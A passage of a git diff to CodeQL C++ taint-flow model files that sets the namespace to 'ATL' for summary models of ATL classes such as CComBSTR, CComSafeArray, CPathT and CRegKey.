"manual"] - - ["", "CAtlFile", True, "CAtlFile", "(HANDLE)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CAtlFile", True, "Create", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CAtlFile", True, "Read", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["ATL", "CAtlFile", True, "CAtlFile", "(CAtlFile &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CAtlFile", True, "CAtlFile", "(HANDLE)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CAtlFile", True, "Create", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CAtlFile", True, "Read", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] diff --git a/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml b/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml index e8ccc9b2fd3b..78b83e8920a4 100644 --- a/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml +++ b/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml @@ -3,12 +3,12 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CAtlFileMappingBase", True, "CAtlFileMappingBase", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CAtlFileMappingBase", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CAtlFileMappingBase", True, "GetData", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CAtlFileMappingBase", True, "GetHandle", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CAtlFileMappingBase", True, "MapFile", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CAtlFileMappingBase", True, "MapSharedMem", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] - - ["", "CAtlFileMappingBase", True, "OpenMapping", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CAtlFileMappingBase", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CAtlFileMappingBase", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CAtlFileMappingBase", True, "CAtlFileMappingBase", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CAtlFileMappingBase", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CAtlFileMappingBase", True, "GetData", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CAtlFileMappingBase", True, "GetHandle", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CAtlFileMappingBase", True, "MapFile", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CAtlFileMappingBase", True, "MapSharedMem", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CAtlFileMappingBase", True, "OpenMapping", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CAtlFileMappingBase", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CAtlFileMappingBase", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml index 6d952f2ca133..4ed1c2a4a9d4 100644 --- a/cpp/ql/lib/ext/CAtlList.model.yml +++ b/cpp/ql/lib/ext/CAtlList.model.yml @@ -3,13 +3,13 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CAtlList", True, "AddHead", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "AddHeadList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "AddTail", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlList", True, "AddHead", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlList", True, "AddHeadList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlList", True, "AddTail", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["ATL", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] diff --git a/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml b/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml index 71a05266a2d3..d2486eb1fa1a 100644 --- a/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml +++ b/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml @@ -3,6 +3,6 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CAtlTemporaryFile", True, "Create", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CAtlTemporaryFile", True, "Read", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] - - ["", "CAtlTemporaryFile", True, "Write", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CAtlTemporaryFile", True, "Create", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CAtlTemporaryFile", True, "Read", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["ATL", "CAtlTemporaryFile", True, "Write", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index d31f3e36a512..8848905aff10 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -3,31 +3,31 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CComBSTR", True, "CComBSTR", "(LPCSTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "CComBSTR", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "CComBSTR", "(int,LPCSTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "CComBSTR", "(int,LPCOLESTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "CComBSTR", "(const CComBSTR &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "CComBSTR", "(CComBSTR &&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "Append", "(const CComBSTR &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "Append", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "Append", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "Append", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "Append", "(LPCSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "Append", "(LPCOLESTR,int)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "AppendBytes", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "AppendBSTR", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "ArrayToBSTR", "", "", "Argument[*0].Field[*pvData]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "AssignBSTR", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[**0].Field[*pvData]", "value", "manual"] - - ["", "CComBSTR", True, "Copy", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CComBSTR", True, "CopyTo", "", "", "Argument[-1]", "Argument[*0]", "value", "manual"] - - ["", "CComBSTR", True, "LoadString", "(HINSTANCE,UINT)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "LoadString", "(UINT)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CComBSTR", True, "WriteToStream", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] - - ["", "CComBSTR", True, "operator BSTR", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] \ No newline at end of file + - ["ATL", "CComBSTR", True, "CComBSTR", "(LPCSTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComBSTR", True, "CComBSTR", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComBSTR", True, "CComBSTR", "(int,LPCSTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComBSTR", True, "CComBSTR", "(int,LPCOLESTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComBSTR", True, "CComBSTR", "(const CComBSTR &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComBSTR", True, "CComBSTR", "(CComBSTR &&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComBSTR", True, "Append", "(const CComBSTR &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "Append", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "Append", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "Append", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "Append", "(LPCSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "Append", "(LPCOLESTR,int)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "AppendBytes", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "AppendBSTR", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "ArrayToBSTR", "", "", "Argument[*0].Field[*pvData]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComBSTR", True, "AssignBSTR", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[**0].Field[*pvData]", "value", "manual"] + - ["ATL", "CComBSTR", True, "Copy", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CComBSTR", True, "CopyTo", "", "", "Argument[-1]", "Argument[*0]", "value", "manual"] + - ["ATL", "CComBSTR", True, "LoadString", "(HINSTANCE,UINT)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "LoadString", "(UINT)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "WriteToStream", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "operator BSTR", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CComSafeArray.model.yml b/cpp/ql/lib/ext/CComSafeArray.model.yml index 61aec61e7d2b..0067c7aab081 100644 --- a/cpp/ql/lib/ext/CComSafeArray.model.yml +++ b/cpp/ql/lib/ext/CComSafeArray.model.yml @@ -3,24 +3,24 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CComSafeArray", True, "CComSafeArray", "(const CComSafeArray &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComSafeArray", True, "CComSafeArray", "(const SAFEARRAY &)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - - ["", "CComSafeArray", True, "CComSafeArray", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - - ["", "CComSafeArray", True, "Add", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - - ["", "CComSafeArray", True, "Add", "(const T &,BOOL)", "", "Argument[*@0]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] - - ["", "CComSafeArray", True, "Attach", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - - ["", "CComSafeArray", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - - ["", "CComSafeArray", True, "CopyTo", "", "", "Argument[-1].Field[*m_psa]", "Argument[*0]", "value", "manual"] - - ["", "CComSafeArray", True, "GetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] - - ["", "CComSafeArray", True, "GetLowerBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CComSafeArray", True, "GetSafeArrayPtr", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] - - ["", "CComSafeArray", True, "GetUpperBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CComSafeArray", True, "MultiDimGetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "Argument[*@1]", "value", "manual"] - - ["", "CComSafeArray", True, "MultiDimSetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] - - ["", "CComSafeArray", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] - - ["", "CComSafeArray", True, "operator LPSAFEARRAY", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] - - ["", "CComSafeArray", True, "operator[]", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] - - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray &)", "", "Argument[*0].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] - - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray &)", "", "Argument[*0].Field[*m_psa]", "Argument[-1].Field[*m_psa]", "value", "manual"] - - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file + - ["ATL", "CComSafeArray", True, "CComSafeArray", "(const CComSafeArray &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "CComSafeArray", "(const SAFEARRAY &)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "CComSafeArray", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "Add", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "Add", "(const T &,BOOL)", "", "Argument[*@0]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "Attach", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "CopyTo", "", "", "Argument[-1].Field[*m_psa]", "Argument[*0]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "GetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "GetLowerBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CComSafeArray", True, "GetSafeArrayPtr", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "GetUpperBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CComSafeArray", True, "MultiDimGetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "Argument[*@1]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "MultiDimSetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "operator LPSAFEARRAY", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "operator[]", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "operator=", "(const CComSafeArray &)", "", "Argument[*0].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "operator=", "(const CComSafeArray &)", "", "Argument[*0].Field[*m_psa]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["ATL", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CPathT.model.yml b/cpp/ql/lib/ext/CPathT.model.yml index 870e7ac55360..874a791a8b23 100644 --- a/cpp/ql/lib/ext/CPathT.model.yml +++ b/cpp/ql/lib/ext/CPathT.model.yml @@ -3,21 +3,21 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CPathT", True, "CPathT", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CPathT", True, "AddExtension", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CPathT", True, "Append", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CPathT", True, "Combine", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CPathT", True, "Combine", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] - - ["", "CPathT", True, "CommonPrefix", "", "", "Argument[*0]", "ReturnValue", "taint", "manual"] - - ["", "CPathT", True, "CommonPrefix", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CPathT", True, "GetExtension", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CPathT", True, "RelativePathTo", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"] - - ["", "CPathT", True, "RelativePathTo", "", "", "Argument[*2]", "ReturnValue[-1]", "taint", "manual"] - - ["", "CPathT", True, "RenameExtension", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"] + - ["ATL", "CPathT", True, "CPathT", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CPathT", True, "AddExtension", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CPathT", True, "Append", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CPathT", True, "Combine", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CPathT", True, "Combine", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CPathT", True, "CommonPrefix", "", "", "Argument[*0]", "ReturnValue", "taint", "manual"] + - ["ATL", "CPathT", True, "CommonPrefix", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CPathT", True, "GetExtension", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CPathT", True, "RelativePathTo", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"] + - ["ATL", "CPathT", True, "RelativePathTo", "", "", "Argument[*2]", "ReturnValue[-1]", "taint", "manual"] + - ["ATL", "CPathT", True, "RenameExtension", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"] # Note: These don't work currently since we cannot use the template parameter in the name of the function - # - ["", "CPathT", True, "operator const T &", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - # - ["", "CPathT", True, "operator T &", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CPathT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CPathT", True, "operator+=", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CPathT", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] - - ["", "CPathT", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + # - ["ATL", "CPathT", True, "operator const T &", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + # - ["ATL", "CPathT", True, "operator T &", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CPathT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CPathT", True, "operator+=", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CPathT", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CPathT", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index 1cf2a7d67733..b601cabefd8d 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -3,18 +3,18 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CRegKey", True, "CRegKey", "(CRegKey &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CRegKey", True, "CRegKey", "(HKEY)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CRegKey", True, "Create", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] - - ["", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - - ["", "CRegKey", True, "operator HKEY", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CRegKey", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - - ["", "CRegKey", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file + - ["ATL", "CRegKey", True, "CRegKey", "(CRegKey &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CRegKey", True, "CRegKey", "(HKEY)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CRegKey", True, "Create", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["ATL", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["ATL", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["ATL", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["ATL", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["ATL", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] + - ["ATL", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] + - ["ATL", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] + - ["ATL", "CRegKey", True, "operator HKEY", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CRegKey", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CRegKey", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CSimpleArray.model.yml b/cpp/ql/lib/ext/CSimpleArray.model.yml index 8daae929651e..d662b7afe2a1 100644 --- a/cpp/ql/lib/ext/CSimpleArray.model.yml +++ b/cpp/ql/lib/ext/CSimpleArray.model.yml @@ -3,10 +3,10 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CSimpleArray", True, "CSimpleArray", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleArray", True, "Add", "", "", "Argument[*0]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CSimpleArray", True, "SetAtIndex", "", "", "Argument[*1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CSimpleArray", True, "operator=", 